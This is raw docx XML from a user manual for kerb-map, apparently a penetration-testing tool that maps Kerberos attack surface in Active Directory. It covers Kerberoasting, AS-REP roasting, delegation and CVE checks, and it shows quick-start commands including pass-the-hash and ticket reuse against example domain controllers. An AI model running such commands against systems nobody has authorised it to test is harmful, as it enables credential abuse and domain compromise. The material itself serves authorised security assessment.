          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 10 — Typical Engagement Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 Step 1: Initial Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Step 2: Review Priority Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 Step 3: Export for Graph Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4 Step 4: CVE Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10.5 Step 5: Follow Next Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 11 — Project Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 12 — Extending kerb-map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1 Adding a New CVE Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.2 Adding a New Enumeration Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">12.3 Customising the Scorer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 13 — Legal Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 1 — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What kerb-map Does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map is a comprehensive Kerberos attack surface mapper for Active Directory environments. It provides the following capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Principal Name (SPN) discovery and Kerberoast scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP roastable account identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Delegation mapping (unconstrained, constrained, and RBCD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Privileged user and stale account enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE detection for 10 known Active Directory vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority-ranked findings with actionable next steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound-compatible JSON export for graph analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Structured JSON export for integration with other tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption type auditing (RC4, DES, weak DC configurations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain and forest trust mapping with risk assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map is built on three core principles:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Safe by default — No module performs destructive or aggressive actions unless explicitly enabled with --aggressive. Default scans use only LDAP queries that blend with normal domain traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tell me what to do next — Every finding includes a prioritised score and a concrete next-step command. The operator never has to guess what to run after the scan completes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Don’t rebuild what exists — kerb-map focuses on discovery and scoring. It hands off exploitation to established tools like impacket, Rubeus, and Certipy rather than reimplementing their functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3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Requirement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Python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3.10 or higher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ldap3</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Python LDAP library for all enumeration queries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impacket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Required for Kerberos and NTLM authentication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rich</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Terminal formatting and progress display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Network Access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TCP 389 (LDAP) and TCP 636 (LDAPS) to domain controllers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Domain Account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Any authenticated domain user (no admin rights needed for default scans)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 2 — Quick Start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Basic Scan — Password Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a default scan against a domain controller using plaintext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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Password123' -dc 10.10.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This performs SPN scanning, AS-REP checking, delegation mapping, user enumeration, encryption auditing, and trust mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticate with an NTLM hash instead of a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python kerb-map.py -d CORP.LOCAL -u jsmith -H aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -dc 10.10.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Kerberos Ticket (ccache)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use an existing Kerberos ticket from a ccache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export KRB5CCNAME=/tmp/jsmith.ccache</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py -d CORP.LOCAL -u jsmith -k -dc dc01.corp.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Full Scan With CVEs and JSON Export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Run all modules including CVE detection and export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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Password123' \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    -dc 10.10.10.1 --cves --aggressive -o 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C0000" w:sz="12"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">WARNING</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The --aggressive flag enables CVE checks that send non-standard traffic to the domain controller (ZeroLogon, PrintNightmare, PetitPotam). These checks may trigger security alerts or, in rare cases, cause service disruption. Only use --aggressive in authorised engagements with explicit written permission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 3 — Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map supports three authentication methods. All modules use the same credential set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Plaintext Password (-p)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The simplest method. The password is used for both LDAP binding and Kerberos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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Password123' -dc 10.10.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Pass-the-Hash (-H)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide an NTLM hash (LM:NT or NT-only format). kerb-map uses the hash for NTLM authentication to LDAP and for any Kerberos operations requiring a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python kerb-map.py -d CORP.LOCAL -u jsmith -H &lt;LM&gt;:&lt;NT&gt; -dc 10.10.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Kerberos ccache (-k)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a pre-existing Kerberos ticket. Set the KRB5CCNAME environment variable to point to the ccache file, then pass -k. The -dc target should be the FQDN of the domain controller (not an IP) so that Kerberos service ticket requests resolve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export KRB5CCNAME=/tmp/jsmith.ccache</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py -d CORP.LOCAL -u jsmith -k -dc dc01.corp.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 4 — Module Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 SPN Scanner (--spn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
